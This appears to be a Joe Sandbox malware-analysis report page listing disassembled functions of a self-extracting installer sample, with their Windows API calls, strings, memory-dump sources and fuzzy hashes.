plA, xrefs: 0040D7F5
XkA, xrefs: 0040D7B1
XkA, xrefs: 0040D7A3
xmA, xrefs: 0040D7B8
xmA, xrefs: 0040D7AA
`lA, xrefs: 0040D7FC

Memory Dump Source

Source File: 00000000.00000002.2539634626.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2539573023.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2539727471.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2539792747.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2539877583.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_T8xrZb7nBL.jbxd

Similarity

API ID: ExceptionThrow
String ID: XkA$XkA$`lA$plA$xmA$xmA
API String ID: 432778473-1797977924
Opcode ID: 53bc111bba272141f362da7732371027c6ffd9fc40c0fe37927965c24cbe44eb
Instruction ID: 93ec62a24b9d8e66450440f0cc9ce576a4bb083ddd4f3a3c79e319c7eabf7869
Opcode Fuzzy Hash: 53bc111bba272141f362da7732371027c6ffd9fc40c0fe37927965c24cbe44eb
Instruction Fuzzy Hash: AB11D3B0601B008AC3308F169549587FBF8EF51758712CA1FD09A97A10D3F8E1888B99

Function 004054C1 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 92COMMON

Download Yara Rule

APIs

??3@YAXPAX@Z.MSVCRT(?,00419858,00000001,00419858,00419858,00000001,?,00000000), ref: 00405543
??3@YAXPAX@Z.MSVCRT(?,?,?,00000000,00419858,;!@InstallEnd@!,00000000,;!@Install@!UTF-8!,0041942C,00419858,00000001,?,00000000), ref: 004055A5
??3@YAXPAX@Z.MSVCRT(?,?,?,00000000,00419858,;!@InstallEnd@!,00000000,;!@Install@!UTF-8!,0041942C,00419858,00000001,?,00000000), ref: 004055BD

Part of subcall function 004036F1: lstrlenW.KERNEL32(004017CF,00000000,?,?,?,?,?,?,004017CF,?), ref: 004036FE
Part of subcall function 004036F1: GetSystemTimeAsFileTime.KERNEL32(?,004017CF,?,?,?,?,004017CF,?), ref: 00403774
Part of subcall function 004036F1: GetFileAttributesW.KERNELBASE(?,?,?,?,?,004017CF,?), ref: 0040377B
Part of subcall function 004036F1: ??3@YAXPAX@Z.MSVCRT(?,004017CF,?,?,?,?,004017CF,?), ref: 0040383A

Strings

;!@Install@!UTF-8!, xrefs: 0040555E
;!@InstallEnd@!, xrefs: 00405578

Memory Dump Source

Source File: 00000000.00000002.2539634626.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2539573023.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2539727471.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2539792747.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2539877583.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_T8xrZb7nBL.jbxd

Similarity

API ID: ??3@$FileTime$AttributesSystemlstrlen
String ID: ;!@Install@!UTF-8!$;!@InstallEnd@!
API String ID: 4038993085-372238525
Opcode ID: 849f327bd9ac8303497e36da2cb4c6cf22b81a2f47b021e930ca904fa6e9320b
Instruction ID: 9c73dee187ac7940ac785f0cdfe29d60513ad58ba118a45472d9fba9eb214e5e
Opcode Fuzzy Hash: 849f327bd9ac8303497e36da2cb4c6cf22b81a2f47b021e930ca904fa6e9320b
Instruction Fuzzy Hash: EA314871D0021AEACF01EF92CC569EEBB75FF58318F10402BE415722D1DB785645DB98

Function 00401000 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 58stringCOMMON

Download Yara Rule

APIs

wsprintfW.USER32 ref: 00401053
wsprintfW.USER32 ref: 00401071
lstrcatW.KERNEL32(?,?), ref: 00401084
ExitProcess.KERNEL32 ref: 004010AC

Strings

0x%p, xrefs: 0040106B

Memory Dump Source

Source File: 00000000.00000002.2539634626.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2539573023.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2539727471.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2539792747.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2539877583.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_T8xrZb7nBL.jbxd

Similarity

API ID: wsprintf$ExitProcesslstrcat
String ID: 0x%p
API String ID: 2530384128-1745605757
Opcode ID: 10580a38aa47e309b50d487dd3db663a32dca6cab9aaec04e50353585ed6c2b6
Instruction ID: 82a0a4c7c3cac984b025113f951df6a1ad0c5e072908762b67de37e2b53db34b
Opcode Fuzzy Hash: 10580a38aa47e309b50d487dd3db663a32dca6cab9aaec04e50353585ed6c2b6
Instruction Fuzzy Hash: A4114FB5800308EFDB20EFA4DD85ADBB3BCAF44304F54447BE645A3591D678AA84CF69

Function 00407DA1 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 55COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 00407DB6
SHBrowseForFolderW.SHELL32(?), ref: 00407DCF
SHGetPathFromIDListW.SHELL32(00000000,00000000), ref: 00407DEB
SHGetMalloc.SHELL32(00000000), ref: 00407E15

Part of subcall function 00407B90: GetDlgItem.USER32(?,000004B6), ref: 00407B9D
Part of subcall function 00407B90: SetFocus.USER32(00000000,?,?,00407C84,000004B6,?), ref: 00407BA4

Strings

A, xrefs: 00407DC8

Memory Dump Source

Source File: 00000000.00000002.2539634626.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2539573023.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2539727471.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2539792747.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2539877583.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_T8xrZb7nBL.jbxd

Similarity

API ID: BrowseFocusFolderFromItemListMallocPathmemset
String ID: A
API String ID: 1557639607-3554254475
Opcode ID: 18cc2c60aeb3b7b122a965faa4dd677926e4bfd12edb83007c1ba79b931f09b9
Instruction ID: c991f1184b04d71a34ab75a046ed33f3991a90ed18c7befb8679fee52583d13b
Opcode Fuzzy Hash: 18cc2c60aeb3b7b122a965faa4dd677926e4bfd12edb83007c1ba79b931f09b9
Instruction Fuzzy Hash: C3111F71A04208EBDB20DBA5C958BDE77BCAB84705F1400B9E905E7281DB78EE45CBB5

Function 00402B71 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 53COMMON

Download Yara Rule

APIs

ExpandEnvironmentStringsW.KERNEL32(00000000,?,00000001,00000000,?,?,?), ref: 00402BA2
??3@YAXPAX@Z.MSVCRT(?), ref: 00402BAB

Part of subcall function 00401172: ??2@YAPAXI@Z.MSVCRT(00000000,00000000,?,00000000,0040146C,00000003,?,004057B0,?,00000000), ref: 00401192
Part of subcall function 00401172: ??3@YAXPAX@Z.MSVCRT(?,00000000,?,00000000,0040146C,00000003,?,004057B0,?,00000000), ref: 004011B8

ExpandEnvironmentStringsW.KERNEL32(SetEnvironment,00000000,00000001,00000001,SetEnvironment), ref: 00402BC3
??3@YAXPAX@Z.MSVCRT(?,?), ref: 00402BE3

Strings

SetEnvironment, xrefs: 00402BB3, 00402BC2

Memory Dump Source

Source File: 00000000.00000002.2539634626.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2539573023.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2539727471.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2539792747.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2539877583.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_T8xrZb7nBL.jbxd

Similarity

API ID: ??3@$EnvironmentExpandStrings$??2@
String ID: SetEnvironment
API String ID: 612612615-360490078
Opcode ID: e8fa0b3595be2272ca7cde4f10b0f5fc0921c74a93664c9e2b34059132f8f849
Instruction ID: 872148d7285510cba3beb976fe90dd67b0f7b9c7622c942f2c5d0e041fd95c9f
Opcode Fuzzy Hash: e8fa0b3595be2272ca7cde4f10b0f5fc0921c74a93664c9e2b34059132f8f849
Instruction Fuzzy Hash: 93015E72D00104BADB15ABA5ED81DEEB3BCAF44314B10416BF902B71D1DBB96A418AA8

Function 0040464B Relevance: 7.6, APIs: 5, Instructions: 96stringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(004193C0,00000020,-00000002,-00000004,00405FF0,-00000002,?,?,00000000,0000000A), ref: 00404664
??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?), ref: 00404716
??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?), ref: 0040471E
??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?), ref: 0040472D
??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?), ref: 00404735

Memory Dump Source

Source File: 00000000.00000002.2539634626.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2539573023.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2539727471.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2539792747.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2539877583.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_T8xrZb7nBL.jbxd

Similarity

API ID: ??3@$lstrlen
String ID:
API String ID: 2031685711-0
Opcode ID: d15cad0f0c41d13a09eacb462fe7c815c34d510d673a08016ce01c41ca1114b9
Instruction ID: aeb94b40578403fee1b74b38ef18ad41e7f72b790eaa200ba48685626c4261d0
Opcode Fuzzy Hash: d15cad0f0c41d13a09eacb462fe7c815c34d510d673a08016ce01c41ca1114b9
Instruction Fuzzy Hash: 6B214972D00104ABCF216FA0CC019EE77A8EF96355F10443BEA41B72E1F77E4D818648

Function 0040809D Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 85COMMON

Download Yara Rule

APIs

Part of subcall function 00407A6B: GetSystemMetrics.USER32(0000000B), ref: 00407A93
Part of subcall function 00407A6B: GetSystemMetrics.USER32(0000000C), ref: 00407A9C

GetSystemMetrics.USER32(00000007), ref: 004080B4
GetSystemMetrics.USER32(00000007), ref: 004080C5
??3@YAXPAX@Z.MSVCRT(?,000004B8,?,?), ref: 0040818C

Strings

100%% , xrefs: 004080E4, 004080EB, 00408144

Memory Dump Source

Source File: 00000000.00000002.2539634626.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2539573023.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2539727471.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2539792747.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2539877583.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_T8xrZb7nBL.jbxd

Similarity

API ID: MetricsSystem$??3@
String ID: 100%%
API String ID: 2562992111-568723177
Opcode ID: fabbb39860fad69752470b08725fe937d63e645657f5ef185aad17f5aeca07b3
Instruction ID: 0c509f118c308a7c78e08742548c734dda8a0b47b1f593a1d30cecdc3777ed32
Opcode Fuzzy Hash: fabbb39860fad69752470b08725fe937d63e645657f5ef185aad17f5aeca07b3
Instruction Fuzzy Hash: CE31D471A007059FCB24DF65C9459AEB7F4EF40704B00052ED542A72D1DB74FD45CBA9

Function 00404E99 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 60COMMON

Download Yara Rule

APIs

Part of subcall function 00407C87: GetSystemMetrics.USER32(00000010), ref: 00407CC9
Part of subcall function 00407C87: GetSystemMetrics.USER32(00000011), ref: 00407CD7

wsprintfW.USER32 ref: 00404F19
??3@YAXPAX@Z.MSVCRT(00405872,00000011,00405872,00000000,004166D0,?), ref: 00404F56

Strings

%X - %03X - %03X - %03X - %03X, xrefs: 00404F13
xcA, xrefs: 00404EB7

Memory Dump Source

Source File: 00000000.00000002.2539634626.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2539573023.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2539727471.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2539792747.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2539877583.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_T8xrZb7nBL.jbxd

Similarity

API ID: MetricsSystem$??3@wsprintf
String ID: %X - %03X - %03X - %03X - %03X$xcA
API String ID: 1174869416-1550840741
Opcode ID: 13607f26764211286450a12f581171f5f33c4cbed9d170023895b6b5c7c453f0
Instruction ID: 41466d8614d0a23c37c50aec3ef54a83e840c1df2718244856808616b3002f3b
Opcode Fuzzy Hash: 13607f26764211286450a12f581171f5f33c4cbed9d170023895b6b5c7c453f0
Instruction Fuzzy Hash: F9117F71D44218ABDB15EB90DC56FEDB334BB10B08F10417EEA55361D2DBB86A44CB9C

Function 0040421B Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 26stringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(Mg@,00000000,?,00000000,00404262,00000000,00000000,0040674D,?,waitall,00000000,00000000,?,?,00419810), ref: 00404228
lstrlenW.KERNEL32(?,?,?,00419810), ref: 00404231
_wcsnicmp.MSVCRT ref: 0040423D

Strings

Mg@, xrefs: 00404224

Memory Dump Source

Source File: 00000000.00000002.2539634626.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2539573023.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2539727471.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2539792747.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2539877583.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_T8xrZb7nBL.jbxd

Similarity

API ID: lstrlen$_wcsnicmp
String ID: Mg@
API String ID: 2823567412-3680729969
Opcode ID: ba891c330881e9cd37824329b79c8b3bdedf28b88df0ad5e9eae37b6568f1235
Instruction ID: 9e1626592046255a92b3b8c2eb79444d9ed7104295bc7c238f4b93e2fb8c8d27
Opcode Fuzzy Hash: ba891c330881e9cd37824329b79c8b3bdedf28b88df0ad5e9eae37b6568f1235
Instruction Fuzzy Hash: 09E026726042019BC700CBA5ED84C8B7BECEAC8790B00087BF700E3011E334D8148BB5

Function 004023B5 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 13libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32,Wow64RevertWow64FsRedirection,00406A9D,00000000,?,?), ref: 004023C8
GetProcAddress.KERNEL32(00000000), ref: 004023CF

Strings

Wow64RevertWow64FsRedirection, xrefs: 004023BE
kernel32, xrefs: 004023C3

Memory Dump Source

Source File: 00000000.00000002.2539634626.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2539573023.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2539727471.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2539792747.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2539877583.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_T8xrZb7nBL.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: Wow64RevertWow64FsRedirection$kernel32
API String ID: 2574300362-3900151262
Opcode ID: cd6f73cecb1163c3412e02ff2c631c42379205c8e465c85e169b66b0ab90bb67
Instruction ID: 50d9489a907287b4f58dec005f8c8a71b0fe89906bae8f062ddf8536b40cf8c2
Opcode Fuzzy Hash: cd6f73cecb1163c3412e02ff2c631c42379205c8e465c85e169b66b0ab90bb67
Instruction Fuzzy Hash: C3D0C970A91700FBDB511FA0EE2DBD636A6EB80B0BF448436E812A00F0C7FC4884CA1C

Function 004023E9 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 12libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32,Wow64DisableWow64FsRedirection,0040243F,?,004069D7,?,00000000,?,?), ref: 004023FA
GetProcAddress.KERNEL32(00000000), ref: 00402401

Strings

kernel32, xrefs: 004023F5
Wow64DisableWow64FsRedirection, xrefs: 004023F0

Memory Dump Source

Source File: 00000000.00000002.2539634626.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2539573023.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2539727471.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2539792747.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2539877583.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_T8xrZb7nBL.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: Wow64DisableWow64FsRedirection$kernel32
API String ID: 2574300362-736604160
Opcode ID: 3cb0454e562955199366be55c27431b89f07c429e32f9a257932cf547d8e03b3
Instruction ID: 88d9777829bf04cc8710f0dfabc1d7fbda4bae52ffa2c7d5b88ac942ae81d74a
Opcode Fuzzy Hash: 3cb0454e562955199366be55c27431b89f07c429e32f9a257932cf547d8e03b3
Instruction Fuzzy Hash: FFD0C970691600FAD7105FA4DD2DBC639A6AFC0B06F548026A016E00D4C7FC4880861D

Function 00402DD6 Relevance: 6.1, APIs: 4, Instructions: 101COMMON

Download Yara Rule

APIs

??3@YAXPAX@Z.MSVCRT(00405802,00405802,00000000,00000020,?,?,?,?,?,?,?,?,?,00405802,00000000,00000000), ref: 00402EDC

Part of subcall function 00402AD8: MultiByteToWideChar.KERNEL32(00000020,00000000,00000024,?,00000000,?,?,00000020,00000024,00000000,00402E3A,?,?,00000000,00000000,00000000), ref: 00402B0A

??3@YAXPAX@Z.MSVCRT(?,00000000,00000000,00000000,00000020,?,?,?,?,?,?,?,?,?,00405802,00000000), ref: 00402E49
??3@YAXPAX@Z.MSVCRT(?,?,00000000,00000000,00000000,00000020,?,?,?,?,?,?,?,?,?,00405802), ref: 00402E64
??3@YAXPAX@Z.MSVCRT(?,?,?,00000000,00000000,00000000,00000020,?,?,?,?,?,?,?,?,?), ref: 00402E6C

Memory Dump Source

Source File: 00000000.00000002.2539634626.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2539573023.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2539727471.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2539792747.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2539877583.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_T8xrZb7nBL.jbxd

Similarity

API ID: ??3@$ByteCharMultiWide
String ID:
API String ID: 1731127917-0
Opcode ID: 06566461e08c1a272ac3e39536e9c8754d999218ac62e5e41573a74a5ed02a71
Instruction ID: e682ebc0571d90e9fd1001dd074fc16d37aecbe567f5019eda1f00a411694e7c
Opcode Fuzzy Hash: 06566461e08c1a272ac3e39536e9c8754d999218ac62e5e41573a74a5ed02a71
Instruction Fuzzy Hash: BE31F672C44114AADB14FBA2DD429EF73BDEF10318B50443FF856B21E1EE3C9A4586A8

Function 0040CD11 Relevance: 6.1, APIs: 4, Instructions: 58COMMON

Download Yara Rule

APIs

_CxxThrowException.MSVCRT(00100EC3,00417010), ref: 0040CD3C
??2@YAPAXI@Z.MSVCRT(00000004,004193AC,004193AC,00000000,?,0040CE09,00000064,004107AA,004193AC,004032FF,00000000,00000000,004049F2,?,?,?), ref: 0040CD64
memcpy.MSVCRT(00000000,009BAF28,00000004,004193AC,004193AC,00000000,?,0040CE09,00000064,004107AA,004193AC,004032FF,00000000,00000000,004049F2,?), ref: 0040CD8D
??3@YAXPAX@Z.MSVCRT(009BAF28,004193AC,004193AC,00000000,?,0040CE09,00000064,004107AA,004193AC,004032FF,00000000,00000000,004049F2,?,?,?), ref: 0040CD98

Memory Dump Source

Source File: 00000000.00000002.2539634626.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2539573023.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2539727471.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2539792747.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2539877583.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_T8xrZb7nBL.jbxd

Similarity

API ID: ??2@??3@ExceptionThrowmemcpy
String ID:
API String ID: 3462485524-0
Opcode ID: 921dd64680e7e3a1ec90b61e2a1bd2c818f6053e54720969ddb0d42743a11d4e
Instruction ID: d1fdfccabdcefd16927407a1053df183a81c89610647dbf5fb7e55cd38556c17
Opcode Fuzzy Hash: 921dd64680e7e3a1ec90b61e2a1bd2c818f6053e54720969ddb0d42743a11d4e
Instruction Fuzzy Hash: 2F11E572200300EBCB289F16D9C0D5BFFE9AF843547108A3FE559A7390D779E98547A8

Function 00408A1C Relevance: 6.1, APIs: 4, Instructions: 57COMMON

Download Yara Rule

APIs

Part of subcall function 004071BD: GetDlgItem.USER32(?,?), ref: 004071C9

Part of subcall function 004071DA: GetDlgItem.USER32(?,?), ref: 004071E7
Part of subcall function 004071DA: ShowWindow.USER32(00000000,?), ref: 004071FE

GetSystemDirectoryW.KERNEL32(?,00000104), ref: 00408A64
SHGetFileInfoW.SHELL32(?,00000000,?,000002B4,00000103), ref: 00408A84
GetDlgItem.USER32(?,000004B7), ref: 00408A97
SetWindowLongW.USER32(00000000,000000FC,Function_00007823), ref: 00408AA5

Part of subcall function 004086EB: GetModuleHandleW.KERNEL32(00000000,00000065,000004B7,?,?,?,?,?,00408AB5), ref: 00408714
Part of subcall function 004086EB: LoadIconW.USER32(00000000), ref: 00408717
Part of subcall function 004086EB: GetSystemMetrics.USER32(00000032), ref: 0040872B
Part of subcall function 004086EB: GetSystemMetrics.USER32(00000031), ref: 00408730
Part of subcall function 004086EB: GetModuleHandleW.KERNEL32(00000000,00000065,00000001,00000000,?,?,?,?,?,00408AB5), ref: 00408739
Part of subcall function 004086EB: LoadImageW.USER32(00000000), ref: 0040873C
Part of subcall function 004086EB: SendMessageW.USER32(?,00000080,00000001,?), ref: 0040875C
Part of subcall function 004086EB: SendMessageW.USER32(?,00000080,00000000,00000000), ref: 00408765
Part of subcall function 004086EB: GetDlgItem.USER32(?,000004B2), ref: 00408781
Part of subcall function 004086EB: GetDlgItem.USER32(?,000004B2), ref: 0040878B
Part of subcall function 004086EB: GetWindowLongW.USER32(?,000000F0), ref: 00408797
Part of subcall function 004086EB: SetWindowLongW.USER32(?,000000F0,00000000), ref: 004087A6
Part of subcall function 004086EB: GetDlgItem.USER32(?,000004B5), ref: 004087B4
Part of subcall function 004086EB: GetDlgItem.USER32(?,000004B5), ref: 004087C2
Part of subcall function 004086EB: GetWindowLongW.USER32(?,000000F0), ref: 004087CE
Part of subcall function 004086EB: SetWindowLongW.USER32(?,000000F0,00000000), ref: 004087DD

Part of subcall function 00407B90: GetDlgItem.USER32(?,000004B6), ref: 00407B9D
Part of subcall function 00407B90: SetFocus.USER32(00000000,?,?,00407C84,000004B6,?), ref: 00407BA4

Memory Dump Source

Source File: 00000000.00000002.2539634626.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2539573023.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2539727471.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2539792747.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2539877583.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_T8xrZb7nBL.jbxd

Similarity

API ID: Item$Window$Long$System$HandleLoadMessageMetricsModuleSend$DirectoryFileFocusIconImageInfoShow
String ID:
API String ID: 3043669009-0
Opcode ID: 10e1b547bcbc61deca10da6efc8ae89d0555480e65f43c52d8748ed5732768f8
Instruction ID: 5c7c764d92766e680c666047e1d2b266a9282aef260ce17b2660fed0a98cdec4
Opcode Fuzzy Hash: 10e1b547bcbc61deca10da6efc8ae89d0555480e65f43c52d8748ed5732768f8
Instruction Fuzzy Hash: 62118672E40314ABCB10EBA9DC09FDE77BCEB84714F10446BB652E72D0DAB8A9018B54

Function 0040709B Relevance: 6.1, APIs: 4, Instructions: 56COMMON

Download Yara Rule

APIs

SystemParametersInfoW.USER32(00000029,000001F4,?,00000000), ref: 004070C2
GetSystemMetrics.USER32(00000031), ref: 004070E8
CreateFontIndirectW.GDI32(?), ref: 004070F7
DeleteObject.GDI32(00000000), ref: 00407126

Memory Dump Source

Source File: 00000000.00000002.2539634626.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2539573023.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2539727471.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2539792747.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2539877583.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_T8xrZb7nBL.jbxd

Similarity

API ID: System$CreateDeleteFontIndirectInfoMetricsObjectParameters
String ID:
API String ID: 1900162674-0
Opcode ID: 10c1999775b064906eaa368cc7bf841ba5ce139f6ebf31b08def3ab2d55476d3
Instruction ID: 550de309380991ebf2cc5542bfcce979d3dc35c4f0fc859f263023f0ef030489
Opcode Fuzzy Hash: 10c1999775b064906eaa368cc7bf841ba5ce139f6ebf31b08def3ab2d55476d3
Instruction Fuzzy Hash: E4112475A00205EFDB109F94DC88BEA77B8EB44300F0081AAE915A7391DB74AD44CF94

Function 00408576 Relevance: 6.0, APIs: 4, Instructions: 47COMMON

Download Yara Rule

APIs

ScreenToClient.USER32(?,?), ref: 004085B0
GetClientRect.USER32(?,?), ref: 004085C2
PtInRect.USER32(?,?,?), ref: 004085D1

Part of subcall function 00407FD8: KillTimer.USER32(?,00000001,?,004085E6), ref: 00407FE6

CallNextHookEx.USER32(?,?,?), ref: 004085F3

Memory Dump Source

Source File: 00000000.00000002.2539634626.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2539573023.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2539727471.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2539792747.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2539877583.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_T8xrZb7nBL.jbxd

Similarity

API ID: ClientRect$CallHookKillNextScreenTimer
String ID:
API String ID: 3015594791-0
Opcode ID: 95547b2fb33734e722a1f749a8458f3d385d37bb62c57a358e3a5d7a24cb2da3
Instruction ID: e461164be05bcb912302e6f3c507a6476d35c8a33c6b54d2dcb30444e6ba8619
Opcode Fuzzy Hash: 95547b2fb33734e722a1f749a8458f3d385d37bb62c57a358e3a5d7a24cb2da3
Instruction Fuzzy Hash: 53018732110109EBDB15AF65DE44AEA7BA6BB18340B04803EE946A62A1DB34EC01DB49

Function 0040411C Relevance: 6.0, APIs: 4, Instructions: 41COMMON

Download Yara Rule

APIs

Part of subcall function 004030EA: GetWindowTextLengthW.USER32(?), ref: 004030FB
